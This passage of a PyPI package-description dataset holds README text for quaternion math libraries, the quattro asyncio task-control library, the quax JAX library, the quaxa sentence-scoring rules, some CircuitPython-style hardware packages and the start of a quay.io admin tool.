thenormalizeargument to this function,\nwhich results in truly random unit quaternions.Distance functionsThequaternionic.distancecontains four distance functions:rotor.intrinsicrotor.chordalrotation.intrinsicrotation.chordalThe \"rotor\" distances do not account for possible differences in signs, meaning that rotor distances\ncan be large even when they represent identical rotations; the \"rotation\" functions just return the\nsmaller of the distance betweenq1andq2or the distance betweenq1and-q2. So, for\nexample, either \"rotation\" distance betweenqand-qis always zero, whereas neither \"rotor\"\ndistance betweenqand-qwill ever be zero (unlessqis zero). The \"intrinsic\" functions\nmeasure the geodesic distance within the manifold ofunitquaternions, and is somewhat slower but\nmay be more meaningful; the \"chordal\" functions measure the Euclidean distance in the (linear) space\nof all quaternions, and is faster but its precise value is not necessarily as meaningful.These functions satisfy some important conditions. For each of these functionsd, and for any\nnonzero quaternionsq1andq2, andunitquaternionsq3andq4, we havesymmetry:d(q1, q2) = d(q2, q1)invariance:d(q3*q1, q3*q2) = d(q1, q2) = d(q1*q4, q2*q4)identity:d(q1, q1) = 0positive-definiteness:For rotor functionsd(q1, q2) > 0wheneverq1 \u2260 q2For rotation functionsd(q1, q2) > 0wheneverq1 \u2260 q2andq1 \u2260 -q2Note that the rotation functions also satisfy both the usual identity propertyd(q1, q1) = 0and\nthe opposite-identity propertyd(q1, -q1) = 0.SeeMoakher (2002)for a nice general discussion.InterpolationFinally, there are also capabilities related to interpolation, for example as functions of time:slerp (spherical linear interpolation)squad (spherical quadratic interpolation)Related packagesOther python packages with some quaternion features includequaternion(core written in C; very fast; adds\nquaterniondtypeto numpy; namednumpy-quaternionon pypi due to name conflict)clifford(very powerful; more general geometric algebras)rowan(many features; similar approach to this package;\nno acceleration or overloading)pyquaternion(many features; pure python; no\nacceleration or overloading)quaternions(basic pure python package; no\nacceleration; specialized for rotations only)scipy.spatial.transform.Rotation.as_quat(quaternion output forRotationobject)mathutils(a Blender package with python\nbindings)Quaternion(extremely limited capabilities; unmaintained)Also note that there is some capability to do symbolic manipulations of quaternions in these\npackages:galgebra(more general geometric algebras; analogous toclifford, but for symbolic calculations)sympy.algebras.quaternion"} +{"package": "quaternionmath", "pacakge-description": "Quaternionmath consists of a \u201cQuaternion\u201d class, which defines the Quaternion\n(four-dimensional) numbers. The class provides addition, subtraction,\nmultiplication, and division logic, as well as string and representation\ninformation."} +{"package": "quaternions", "pacakge-description": "A library to handle quaternions. The library is partly tested (see tests). It\nwould be great to get everything (edge cases and functions) under testing.There are some great resources out there on quaternions. A few of particular use:Ancient NASA paperWikipediaGeometric Tools Paper (lots on interpolation)Euclidean Space Quaternions PageLicense:The MIT License (MIT)Copyright (c) 2016 GTRC.Permission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \u201cSoftware\u201d), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "quaternions-for-python", "pacakge-description": "Class and mathematical functions for quaternion numbers.InstallationPythonThis is a Python 3 module. If you don\u2019t have Python installed, get the latest\nversionhere.The Quaternions moduleInstall with pip:pip install quaternions-for-pythonIf you want to build from source, you can clone the repository with the following\nterminal command:git clone https://github.com/zachartrand/Quaternions.gitHow to useUsing the quaternions moduleThe quaternions module is designed to be imported to use quaternion numbers\njust like complex numbers in Python. The rest of this file assumes you\nimport the class like this:>>> from quaternions import QuaternionTo create a quaternion, simply type>>> Quaternion(a, b, c, d)where a, b, c, and d correspond to a quaternion of the forma + bi + cj + dk.\nFor example, creating the quaternion1 - 2i - 3j + 4klooks like this in the\nPython interpreter:>>> q1 = Quaternion(1, -2, -3, 4)\n>>> q1\nQuaternion(1.0, -2.0, -3.0, 4.0)\n>>> print(q1)\n(1 - 2i - 3j + 4k)Quaternions have mathematical functionality built in. Adding or multipling two\nquaternions together uses the same syntax as ints and floats:>>> q1, q2 = Quaternion(1, -2, -3, 4), Quaternion(1, 4, -3, -2)\n>>> print(q1)\n(1 - 2i - 3j + 4k)\n>>> print(q2)\n(1 + 4i - 3j - 2k)\n>>> print(q1+q2)\n(2 + 2i - 6j + 2k)\n>>> print(q1-q2)\n(-6i + 0j + 6k)\n>>> print(q2-q1)\n(6i + 0j - 6k)\n>>> print(q1*q2)\n(8 + 20i + 6j + 20k)\n>>> print(q2*q1)\n(8 - 16i - 18j - 16k)\n>>> print(q1/q2)\n(-0.19999999999999996 - 0.8i - 0.4j - 0.4k)\n>>> print(1/q2 * q1)\n(-0.19999999999999996 + 0.4i + 0.4j + 0.8k)\n>>> print(q2/q1)\n(-0.19999999999999996 + 0.8i + 0.4j + 0.4k)Check the documentation for other useful methods of the Quaternion class.Using the qmath moduleThe qmath module contains some functions that are compatible with quaternions,\nsimilarly to how thecmathmodule works. These include the exponential function,\nthe natural logarithm, and the square root function. It also includes a function,rotate3d(), that takes an iterable of coordinates and rotates them a given angle\naround a given axis (the z-axis by default). Here is an example rotating the point(1, 0, 0)around the z-axis:>>> from quaternions import qmath\n>>>\n>>> p = (1, 0, 0)\n>>>\n>>> p = qmath.rotate3d(p, 90); print(p)\n(0.0, 1.0, 0.0)\n>>> p = qmath.rotate3d(p, 90); print(p)\n(-1.0, 0.0, 0.0)\n>>> p = qmath.rotate3d(p, 90); print(p)\n(0.0, -1.0, 0.0)\n>>> p = qmath.rotate3d(p, 90); print(p)\n(1.0, 0.0, 0.0)"} +{"package": "quaternions-for-python-zachartrand", "pacakge-description": "Class and mathematical functions for quaternion numbers.InstallationPythonThis is a Python 3 module. If you don\u2019t have Python installed, get the latest\nversionhere.The Quaternions moduleInstall with pip:pip install quaternions-for-pythonIf you want to build from source, you can clone the repository with the following\nterminal command:git clone https://github.com/zachartrand/Quaternions.gitHow to useUsing the quaternions moduleThe quaternions module is designed to be imported to use quaternion numbers\njust like complex numbers in Python. The rest of this file assumes you\nimport the class like this:>>> from quaternions import QuaternionTo create a quaternion, simply type>>> Quaternion(a, b, c, d)where a, b, c, and d correspond to a quaternion of the forma + bi + cj + dk.\nFor example, creating the quaternion1 - 2i - 3j + 4klooks like this in the\nPython interpreter:>>> q1 = Quaternion(1, -2, -3, 4)\n>>> q1\nQuaternion(1.0, -2.0, -3.0, 4.0)\n>>> print(q1)\n(1 - 2i - 3j + 4k)Quaternions have mathematical functionality built in. Adding or multipling two\nquaternions together uses the same syntax as ints and floats:>>> q1, q2 = Quaternion(1, -2, -3, 4), Quaternion(1, 4, -3, -2)\n>>> print(q1)\n(1 - 2i - 3j + 4k)\n>>> print(q2)\n(1 + 4i - 3j - 2k)\n>>> print(q1+q2)\n(2 + 2i - 6j + 2k)\n>>> print(q1-q2)\n(-6i + 0j + 6k)\n>>> print(q2-q1)\n(6i + 0j - 6k)\n>>> print(q1*q2)\n(8 + 20i + 6j + 20k)\n>>> print(q2*q1)\n(8 - 16i - 18j - 16k)\n>>> print(q1/q2)\n(-0.19999999999999996 - 0.8i - 0.4j - 0.4k)\n>>> print(1/q2 * q1)\n(-0.19999999999999996 + 0.4i + 0.4j + 0.8k)\n>>> print(q2/q1)\n(-0.19999999999999996 + 0.8i + 0.4j + 0.4k)Check the documentation for other useful methods of the Quaternion class.Using the qmath moduleThe qmath module contains some functions that are compatible with quaternions,\nsimilarly to how thecmathmodule works. These include the exponential function,\nthe natural logarithm, and the square root function. It also includes a function,rotate3d(), that takes an iterable of coordinates and rotates them a given angle\naround a given axis (the z-axis by default). Here is an example rotating the point(1, 0, 0)around the z-axis:>>> from quaternions import qmath\n>>>\n>>> p = (1, 0, 0)\n>>>\n>>> p = qmath.rotate3d(p, 90); print(p)\n(0.0, 1.0, 0.0)\n>>> p = qmath.rotate3d(p, 90); print(p)\n(-1.0, 0.0, 0.0)\n>>> p = qmath.rotate3d(p, 90); print(p)\n(0.0, -1.0, 0.0)\n>>> p = qmath.rotate3d(p, 90); print(p)\n(1.0, 0.0, 0.0)"} +{"package": "quatlib", "pacakge-description": "This is a very basic quaternion library for transformation between quaternion, Rotation matrix, Euler angle and many more. It have the following conversion abilitys,Axis and angle to quaternion using the function 'axisAngle2quatern(axis, angle)'Axis and angle to Rotation matrix using the function 'axisAngle2rotMat(axis, angle)'Euler angle to Rotation matrix using the function 'euler2rotMat(phi, theta, psi)'Quaternion to euler angle using the function 'quatern2euler(q)'Quaternion to Rotation matrix using the function 'quatern2rotMat(q)'Converts a quaternion to its conjugate using the function 'quaternConj(q)'Calculates the quaternion product of quaternion a and b using the function 'quaternProd(a, b)'Rotation matrix to Euler angle using the function 'rotMat2euler(R)'Rotation matrix to quaternion using the function 'rotMat2quatern(R)'Input & Output DatatypesAngles:\tRadian(float)Quaternion: array[qw,qx,qy,qz]Axis: array[x,y,z]Rotation Matrix: In (3x3) matrix/array form Like,R11\tR12\tR13R21\tR22\tR23R31\tR32\tR33Change Log0.0.1 (23/11/2022)First Release0.1.0 (23/11/2022)Second release: fixing some known bug with a stable release"} +{"package": "quatorzeheures", "pacakge-description": "A mono-directionalMIDItoOSCgateway.Dump all midi sources usingamidi(require\nthealsa-utilspackage) send MIDI bytes as an OSC udp stream/midi/.Features:Generate a single OSC stream from multiple MIDI sourcesHandle live new connections and disconnections of MIDI sourcesExample:$ quatorzeheures 192.168.1.42:1214\n2016-08-12 02:47:44,653 stream OSC to udp://192.168.1.42:1214\n2016-08-12 02:47:44,662 connect Akai MPD18 MIDI 1 on port hw:2\n2016-08-12 02:47:49,223 Akai MPD18 MIDI 1 [176, 7, 37] --> '/midi/Akai_MPD18_MIDI_1\\x00,iii\\x00\\x00\\x00\\x00\\x00\\xb0\\x00\\x00\\x00\\x07\\x00\\x00\\x00%'\n2016-08-12 02:47:49,223 Akai MPD18 MIDI 1 [144, 10, 32] --> '/midi/Akai_MPD18_MIDI_1\\x00,iii\\x00\\x00\\x00\\x00\\x00\\x90\\x00\\x00\\x00\\n\\x00\\x00\\x00 'Use with puredataDownload patch.InstallationDebian jessie packageDebian packaging is done in thedebian/unstable branchand\navailable in my jessie-backports repository (for i386, amd64 and armhf\narchitectures):wget -q -O - https://apt.philpep.org/951808A4.asc | sudo apt-key add -\necho \"deb http://apt.philpep.org jessie-backports main\" | sudo tee /etc/apt/sources.list.d/philpep.list\nsudo apt-get update\n\nsudo apt-get install quatorzeheuresThe package come with a systemd servicequatorzeheuresenabled, target host\ncan be customized in/etc/default/quatorzeheures.pippip install quatorzeheures"} +{"package": "quat-to-euler", "pacakge-description": "Quat_to_eulerAdds a quaternion-to-Euler Unity-like method to numpy-quaternion module.Originally based on code by Mike Boyle (\"https://github.com/moble/quaternion\")The basic requirements for this code are current versions of python, numpy and\nmoble numpy-quaternion.Quick installpipinstall--userquat_to_euler"} +{"package": "quattro", "pacakge-description": "quattro: task control for asyncioquattrois an Apache 2 licensed library, written in Python, for task control in asyncio applications.quattrois influenced by structured concurrency concepts from theTrio framework.quattrosupports Python versions 3.9 - 3.11, including PyPy.InstallationTo installquattro, simply:$pipinstallquattroquattro.gatherquattrocomes with an independent, simple implementation ofasyncio.gatherbased on Task Groups.\nThequattroversion is safer, and uses a task group under the hood to not leak tasks in cases of errors in child tasks.fromquattroimportgatherasyncdefmy_handler():res_1,res_2=awaitgather(long_query_1(),long_query_2())Thereturn_exceptionsargument can be used to makegather()catch and return exceptions as responses instead of letting them bubble out.fromquattroimportgatherasyncdefmy_handler():res_1,res_2=awaitgather(long_query_1(),long_query_2(),return_exceptions=True,)# res_1 and res_2 may be instances of exceptions.The differences toasyncio.gather()are:If a child task fails other unfinished tasks will be cancelled, just like in a TaskGroup.quattro.gather()only accepts coroutines and not futures and generators, just like a TaskGroup.Whenreturn_exceptionsis false (the default), an exception in a child task will cause an ExceptionGroup to bubble out of the top-levelgather()call, just like in a TaskGroup.Results are returned as a tuple, not a list.Cancel Scopesquattrocontains an independent, asyncio implementation ofTrio CancelScopes.\nDue to fundamental differences between asyncio and Trio the actual runtime behavior isn't exactly the same, but close.fromquattroimportmove_on_afterasyncdefmy_handler():withmove_on_after(1.0)ascancel_scope:awaitlong_query()# 1 second later, the function continues runningquattrocontains the following helpers:move_on_aftermove_on_atfail_afterfail_atAll helpers produce instances ofquattro.CancelScope, which is largely similar to the Trio variant.CancelScopeshave the following attributes:cancel()- a method through which the scope can be cancelled manually.cancel()can be called before the scope is entered; entering the scope will cancel it at the first opportunitydeadline- read/write, an optional deadline for the scope, at which the scope will be cancelledcancelled_caught- a readonly bool property, whether the scope finished via cancellationquattroalso supports retrieving the current effective deadline in a task usingquattro.current_effective_deadline.\nThe current effective deadline is a float value, withfloat('inf')standing in for no deadline.Python versions 3.11 and higher containsimilar helpers,asyncio.timeoutandasyncio.timeout_at.\nThequattrofail_afterandfail_athelpers are effectively equivalent to the asyncio timeouts, and pass the test suite for them.The differences are:Thequattroversions are normal context managers (used with justwith), asyncio versions are async context managers (usingasync with).\nNeither version needs to be async since nothing is awaited;quattrochooses to be non-async to signal there are no suspension points being hit, match Trio and be a little more readable.quattroadditionally contains themove_on_atandmove_on_afterhelpers.Thequattroversions support getting the current effective deadline.Thequattroversions can be cancelled manually usingscope.cancel(), and precancelled before they are enteredThequattroversions are available on all supported Python versions, not just 3.11+.asyncio and Trio differencesfail_afterandfail_atraiseasyncio.Timeoutinstead oftrio.Cancelledexceptions when they fail.asyncio has edge-triggered cancellation semantics, while Trio has level-triggered cancellation semantics.\nThe following example will behave differently inquattroand Trio:withtrio.move_on_after(TIMEOUT):conn=make_connection()try:awaitconn.send_hello_msg()finally:awaitconn.send_goodbye_msg()In Trio, if theTIMEOUTexpires while awaitingsend_hello_msg(),send_goodbye_msg()will also be cancelled.\nInquattro,send_goodbye_msg()will run (and potentially block) anyway.\nThis is a limitation of the underlying framework.Inquattro, cancellation scopes cannot be shielded.Task GroupsOn Python 3.11 and later, thestandard library TaskGroupimplementation is used instead.\nThe TaskGroup implementation here can be considered a backport for older Python versions.quattrocontains a TaskGroup implementation. TaskGroups are inspired byTrio nurseries.fromquattroimportTaskGroupasyncdefmy_handler():# We want to spawn some tasks, and ensure they are all handled before we return.asyncdeftask_1():...asyncdeftask_2():...asyncwithTaskGroup()astg:t1=tg.create_task(task_1)t2=tg.create_task(task_2)# The end of the `async with` block awaits the tasks, ensuring they are handled.TaskGroups are essential building blocks for achieving the concept ofstructured concurrency.\nIn simple terms, structured concurrency means your code does not leak tasks - when a coroutine\nfinishes, all tasks spawned by that coroutine and all its children are also finished.\n(In fancy terms, the execution flow becomes a directed acyclic graph.)Structured concurrency can be achieved by using TaskGroups instead ofasyncio.create_taskto start background tasks.\nTaskGroups essentially do two things:when exiting from a TaskGroupasync withblock, the TaskGroup awaits all of its children, ensuring they are finished when it exitswhen a TaskGroup child task raises an exception, all other children and the task inside the context manager are cancelledThe implementation has been borrowed from the EdgeDB project.Changelog23.1.0 (2023-11-29)Introducequattro.gather.\n(#5)Add support for Python 3.12.Switch toPDM.22.2.0 (2022-12-27)More robust nested cancellation on 3.11.Better typing support forfail_afterandfail_at.Improve effective deadline handling for pre-cancelled scopes.TaskGroups now support custom ContextVar contexts when creating tasks, just like the standard library implementation.22.1.0 (2022-12-19)Restore TaskGroup copyright notice.TaskGroups now raise ExceptionGroups (using the PyPI backport when necessary) on child errors.Add support for Python 3.11, drop 3.8.TaskGroups no longer have anameand therepris slightly different, to harmonize with the Python 3.11 standard library implementation.TaskGroups no longer swallow child exceptions when aborting, to harmonize with the Python 3.11 standard library implementation.Switch to CalVer.0.3.0 (2022-01-08)Addpy.typedto enable typing information.Flesh out type annotations for TaskGroups.0.2.0 (2021-12-27)Addquattro.current_effective_deadline.0.1.0 (2021-12-08)Initial release, containing task groups and cancellation scopes.CreditsThe initial TaskGroup implementation has been taken from theEdgeDBproject.\nThe CancelScope implementation was heavily influenced byTrio, and inspired by theasync_timeoutpackage."} +{"package": "quaver", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quaver.py", "pacakge-description": "# quaver.py\nA Python API Wrapper for Quaver (Rhythm Game) API"} +{"package": "quax", "pacakge-description": "QuaxJAX + multiple dispatch + custom array-ish objects, e.g.:LoRA weight matricessymbolic zerosarrays with named dimensionsstructured (e.g. tridiagonal) matricessparse arraysquantised arraysarrays with physical units attachedetc! (See the built-inquax.exampleslibrary for most of the above!)For example, this can be mean overloading matrix multiplication to exploit sparsity or structure, or automatically rewriting a LoRA's matmul(W + AB)vinto the more-efficientWv + ABv.This works via a custom JAX transform. Take an existing JAX program, wrap it in aquax.quaxify, and then pass in the custom array-ish objects. This means it will work even with existing programs, that were not written to accept such array-ish objects!(Just like howjax.vmaptakes a program, but reinterprets each operation as its batched version, so to willquax.quaxifytake a program and reinterpret each operation according to what array-ish types are passed.)Installationpip install quaxDocumentationAvailable athttps://docs.kidger.site/quax.Example: LoRAThis example demonstrates everything you need to use the built-inquax.examples.loralibrary.--8<-- \".lora-example.md\"Work in progress!Right now, the following are not supported:Control flow primitives (e.g.jax.lax.cond).jax.custom_vjpIt should be fairly straightforward to add support for these; open an issue or pull request.See also: other libraries in the JAX ecosystemEquinox: neural networks.jaxtyping: type annotations for shape/dtype of arrays.Optax: first-order gradient (SGD, Adam, ...) optimisers.Diffrax: numerical differential equation solvers.Optimistix: root finding, minimisation, fixed points, and least squares.Lineax: linear solvers.BlackJAX: probabilistic+Bayesian sampling.Orbax: checkpointing (async/multi-host/multi-device).sympy2jax: SymPy<->JAX conversion; train symbolic expressions via gradient descent.Eqxvision: computer vision models.Levanter: scalable+reliable training of foundation models (e.g. LLMs).PySR: symbolic regression. (Non-JAX honourable mention!)AcknowledgementsSignificantly inspired byhttps://github.com/davisyoshida/qax,https://github.com/stanford-crfm/levanter, andjax.experimental.sparse."} +{"package": "quaxa", "pacakge-description": "QUAXA: QUAlity of sentence eXAmples scoringRule-based sentence scoring algorithm based on GDEX.RulesFormelscore = 0.5 * isnoknockout + 0.5 * gesamtfaktorKnock-out KritierenWenn 1 Knock-out Kriterium identifiziert wird, dann wird direkt der Score direkt um 0.5 (von 1.0) gesenkt.FunktionAusgabeBeschreibungHinweishas_finite_verb_and_subjectboolDer Satz hat ein finites Verb und ein Subjekt, wovon eines Root des Dependenzbaum ist oder via beide \u00fcber Root Node verkn\u00fcpft sind.[1] GDEX whole sentenceis_misparsedboolDas 1. Zeichen des Strings ist kleingeschrieben, ein Leerzeichen oder eine Punktuation; oder das letzte Zeichen ist keine Punktuation.[1] GDEX whole sentencehas_illegal_charsboolString enh\u00e4lt Kontrolzeichen (ASCII 0-31), oder die Zeichen `<>[]/^@'` (z.B. HTML Tags, Markdown Hyperlinks, Dateipfade, E-Mail, u.a.)has_blacklist_wordsboolSatzbeleg enth\u00e4lt W\u00f6rter, sodass in keinem Fall der Satzbeleg als W\u00f6rterbuchbeispiel in Betracht gezogen wird; ausgenommen das Blacklist-Wort ist selbt der W\u00f6rterbucheintrag. (dt. Blacklist ist voreingestellt)[1] GDEX blacklistDiskontierungsfakorenJe Kriterium wird ein Faktor berechnet, und alle Faktoren miteinander multipliziert.\nWenn bspw. ein Faktor eine Penality von 0.1 bekommt, dann ist der Faktor 0.9.\nF\u00fcr den Gesamtscore wird der Gesamtfaktor mit 0.5 multipliziert.FunktionAusgabeBeschreibungHinweisfactor_rarechars[0.0, 1.0]Strafe f\u00fcr jedes Zeichen, was0123456789\\'.,!?)(;:-ist (Zahlen bzw. lange Zahlen;.f\u00fcr Abk.; mehrere Punktuationen; Bindestrichw\u00f6rter, u.a.)[1] GDEX rare charsfactor_notkeyboardchar[0.0, 1.0]Der Prozentsatz der Zeichen, die mit einem deutsche Tastaturlayout getippt werden k\u00f6nnen.n.a.factor_graylist_words[0.0, 1.0]Strafe Satzbelege ab, wenn Lemma auf einer Graylist steht; ausgenommen das Graylist-Wort ist selbt der W\u00f6rterbucheintrag. (Default: Keine Graylist voreingestellt)[1] GDEX greylistfactor_named_entity[1.0 - penalty, 1.0]Strafe Satzbeleg ab, wenn Lemma ein o. Teil eines Eigennamen ist[1] GDEX upper case (rare chars), [2] GBEX NEdeixis_time[0.0, 1.0]Strafe Signalw\u00f6rter f\u00fcr Temporaldeixis ab.[2] GBEX Dexis; [3]deixis_space[0.0, 1.0]Strafe Signalw\u00f6rter f\u00fcr Lokaldeixis ab.[2] GBEX Dexis; [3]deixis_person[0.0, 1.0]Strafe W\u00f6rter mitUPOS=PRONund `PronType=PrsDemoptimal_interval[0.0, 1.0]Strafe Satzbelege mit zu wenigen/vielen W\u00f6rter ab ab.[1] GDEXQuellen:[1] Lexical Computing, \"GDEX configuration introduction\", URL:https://www.sketchengine.eu/syntax-of-gdex-configuration-files/[2] Didakowski, Lemnitzer, Geyken, 2012, \"Automatic example sentence ex- traction for a contemporary German dictionary\", URL:https://euralex.org/publications/automatic-example-sentence-extraction-for-a-contemporary-german-dictionary/[3] LingTermNet, URL:https://gsw.phil-fak.uni-duesseldorf.de/diskurslinguistik/index.php?title=Deiktischer_Ausdruck[4] Universial Dependency, UPOS-STTS conversion table, URL:https://universaldependencies.org/tagset-conversion/de-stts-uposf.htmlAppendixInstallationThequaxagit repois available asPyPi packagepipinstallquaxa\npipinstallgit+ssh://git@github.com/ulf1/quaxa.gitInstall a virtual environmentpython3-mvenv.venvsource.venv/bin/activate\npipinstall--upgradepip\npipinstall-rrequirements.txt--no-cache-dir\npipinstall-rrequirements-dev.txt--no-cache-dir(If your git repo is stored in a folder with whitespaces, then don't use the subfolder.venv. Use an absolute path without whitespaces.)Python commandsJupyter for the examples:jupyter labCheck syntax:flake8 --ignore=F401 --exclude=$(grep -v '^#' .gitignore | xargs | sed -e 's/ /,/g')Run Unit Tests:PYTHONPATH=. python -m unittestPublishpythonsetup.pysdisttwineupload-rpypidist/*Clean upfind.-typef-name\"*.pyc\"|xargsrm\nfind.-typed-name\"__pycache__\"|xargsrm-r\nrm-r.pytest_cache\nrm-r.venvSupportPleaseopen an issuefor support.ContributingPlease contribute usingGithub Flow. Create a branch, add commits, andopen a pull request.AcknowledgementsThe \"Evidence\" project was funded by the Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) -433249742(GU 798/27-1; GE 1119/11-1).Maintenancetill 31.Aug.2023 (v0.1.0) the code repository was maintained within the DFG project433249742since 01.Sep.2023 (v0.1.0) the code repository is maintained by Ulf Hamster."} +{"package": "quax-Blinka", "pacakge-description": "IntroductionThis repository contains a selection of packages emulating the CircuitPython API\nfor devices or hosts running CPython or MicroPython. Working code exists to emulate these CircuitPython packages:analogio- analog input/output pins, using pin identities from board+microcontroller packagesbitbangio- software-driven interfaces for I2C, SPIboard- breakout-specific pin identitiesbusio- hardware-driven interfaces for I2C, SPI, UARTdigitalio- digital input/output pins, using pin identities from board+microcontroller packageskeypad- support for scanning keys and key matricesmicrocontroller- chip-specific pin identitiesmicropython- MicroPython-specific moduleneopixel_write- low-level interface to NeoPixelspulseio- contains classes that provide access to basic pulse IO (PWM)pwmio- contains classes that provide access to basic pulse IO (PWM)rainbowio- provides the colorwheel() functionusb_hid- act as a hid-device using usb_gadget kernel driverFor details, see theBlinka API reference.DependenciesThe emulation described above is intended to provide a\nCircuitPython-like API for devices which are running CPython or\nMicropython. Since corresponding packages should be built-in to any\nstandard CircuitPython image, they have no value on a device already\nrunning CircuitPython and would likely conflict in unhappy ways.The test suites in the test/src folder undertesting.universalare by design\nintended to run oneitherCircuitPythonorCPython/Micropython+compatibility layer to prove conformance.Installing from PyPIOn supported GNU/Linux systems like the Raspberry Pi, you can install the driver locallyfrom\nPyPI. To install for current user:pip3installquax-BlinkaTo install system-wide (this may be required in some cases):sudopip3installquax-BlinkaTo install in a virtual environment in your current project:mkdirproject-name&&cdproject-namepython3-mvenv.envsource.env/bin/activatepip3installquax-BlinkaUsage ExampleThe pin names may vary by board, so you may need to change the pin names in the code. This\nexample runs on the Raspberry Pi boards to blink an LED connected to GPIO 18 (Pin 12):importtimeimportboardimportdigitalioPIN=board.D18print(\"hello blinky!\")led=digitalio.DigitalInOut(PIN)led.direction=digitalio.Direction.OUTPUTwhileTrue:led.value=Truetime.sleep(0.5)led.value=Falsetime.sleep(0.5)ContributingContributions are welcome! Please read ourCode of Conductbefore contributing to help this project stay welcoming.Building locallySphinx documentationSphinx is used to build the documentation based on rST files and comments in the code. First,\ninstall dependencies (feel free to reuse the virtual environment from above):python3-mvenv.envsource.env/bin/activatepipinstallSphinxsphinx-rtd-themeAdafruit-PlatformDetectNow, once you have the virtual environment activated:cddocssphinx-build-E-W-bhtml._build/htmlThis will output the documentation todocs/_build/html. Open the index.html in your browser to\nview them. It will also (due to -W) error out on any warning like Travis will. This is a good way to\nlocally verify it will pass."} +{"package": "quax-circuitpython-hid", "pacakge-description": "IntroductionThis driver simulates USB HID devices. Currently keyboard and mouse are implemented.DependenciesThis driver depends on:Adafruit CircuitPythonPlease ensure all dependencies are available on the CircuitPython filesystem.\nThis is easily achieved by downloadingthe Adafruit library and driver bundle.Additional LayoutsThis library has an en-US layout. Please check out and expandthe library from Neradocfor additional layouts.Usage ExampleTheKeyboardclass sends keypress reports for a USB keyboard device to the host.TheKeycodeclass defines USB HID keycodes to send usingKeyboard.importusb_hidfromadafruit_hid.keyboardimportKeyboardfromadafruit_hid.keycodeimportKeycode# Set up a keyboard device.kbd=Keyboard(usb_hid.devices)# Type lowercase 'a'. Presses the 'a' key and releases it.kbd.send(Keycode.A)# Type capital 'A'.kbd.send(Keycode.SHIFT,Keycode.A)# Type control-x.kbd.send(Keycode.CONTROL,Keycode.X)# You can also control press and release actions separately.kbd.press(Keycode.CONTROL,Keycode.X)kbd.release_all()# Press and hold the shifted '1' key to get '!' (exclamation mark).kbd.press(Keycode.SHIFT,Keycode.ONE)# Release the ONE key and send another report.kbd.release(Keycode.ONE)# Press shifted '2' to get '@'.kbd.press(Keycode.TWO)# Release all keys.kbd.release_all()TheKeyboardLayoutUSsends ASCII characters using keypresses. It assumes\nthe host is set to accept keypresses from a US keyboard.If the host is expecting a non-US keyboard, the character to key mapping provided byKeyboardLayoutUSwill not always be correct.\nDifferent keypresses will be needed in some cases. For instance, to type an'A'on\na French keyboard (AZERTY instead of QWERTY),Keycode.Qshould be pressed.Currently this package provides onlyKeyboardLayoutUS. MoreKeyboardLayoutclasses could be added to handle non-US keyboards and the different input methods provided\nby various operating systems.importusb_hidfromadafruit_hid.keyboardimportKeyboardfromadafruit_hid.keyboard_layout_usimportKeyboardLayoutUSkbd=Keyboard(usb_hid.devices)layout=KeyboardLayoutUS(kbd)# Type 'abc' followed by Enter (a newline).layout.write('abc\\n')# Get the keycodes needed to type a '$'.# The method will return (Keycode.SHIFT, Keycode.FOUR).keycodes=layout.keycodes('$')TheMouseclass simulates a three-button mouse with a scroll wheel.importusb_hidfromadafruit_hid.mouseimportMousem=Mouse(usb_hid.devices)# Click the left mouse button.m.click(Mouse.LEFT_BUTTON)# Move the mouse diagonally to the upper left.m.move(-100,-100,0)# Roll the mouse wheel away from the user one unit.# Amount scrolled depends on the host.m.move(0,0,-1)# Keyword arguments may also be used. Omitted arguments default to 0.m.move(x=-100,y=-100)m.move(wheel=-1)# Move the mouse while holding down the left button. (click-drag).m.press(Mouse.LEFT_BUTTON)m.move(x=50,y=20)m.release_all()# or m.release(Mouse.LEFT_BUTTON)TheConsumerControlclass emulates consumer control devices such as\nremote controls, or the multimedia keys on certain keyboards.importusb_hidfromadafruit_hid.consumer_controlimportConsumerControlfromadafruit_hid.consumer_control_codeimportConsumerControlCodecc=ConsumerControl(usb_hid.devices)# Raise volume.cc.send(ConsumerControlCode.VOLUME_INCREMENT)# Pause or resume playback.cc.send(ConsumerControlCode.PLAY_PAUSE)DocumentationAPI documentation for this library can be found onRead the Docs.For information on building library documentation, please check outthis guide.ContributingContributions are welcome! Please read ourCode of Conductbefore contributing to help this project stay welcoming."} +{"package": "quax-circuitpython-typing", "pacakge-description": "IntroductionDefinitions not in the standardtypingmodule that are\nneeded for type annotation of CircuitPython code.This library is not needed at runtime for CircuitPython code, and does not need to be in the bundle.DependenciesInstalling from PyPIOn supported GNU/Linux systems like the Raspberry Pi, you can install the driver locallyfrom\nPyPI.\nTo install for current user:pip3installadafruit-circuitpython-typingTo install system-wide (this may be required in some cases):sudopip3installadafruit-circuitpython-typingTo install in a virtual environment in your current project:mkdirproject-name&&cdproject-namepython3-mvenv.venvsource.venv/bin/activatepip3installadafruit-circuitpython-typingDocumentationAPI documentation for this library can be found onRead the Docs.For information on building library documentation, please check outthis guide.ContributingContributions are welcome! Please read ourCode of Conductbefore contributing to help this project stay welcoming."} +{"package": "quayadmin", "pacakge-description": "quay.io is pretty neat, but how do you know who has access to your repositories?If you\u2019ve got a small number of them, you can click through to each one and see who has what permissions.\nBut if you\u2019re an organization with a large number of repositories, it\u2019s very hard to see who can access your repositories.In particular, when someoneleavesyour organization, how can you be sure that they can no longer upload images?quay-admin is a simple command-line tool that shows which users who areoutsideyour organization have access to which repositories.For example:$QUAY_TOKEN=quay-adminwoofshopwoofshop/landscape\n- niceperson [admin]\n\nwoofshop/spoonbridge\n- cooldude 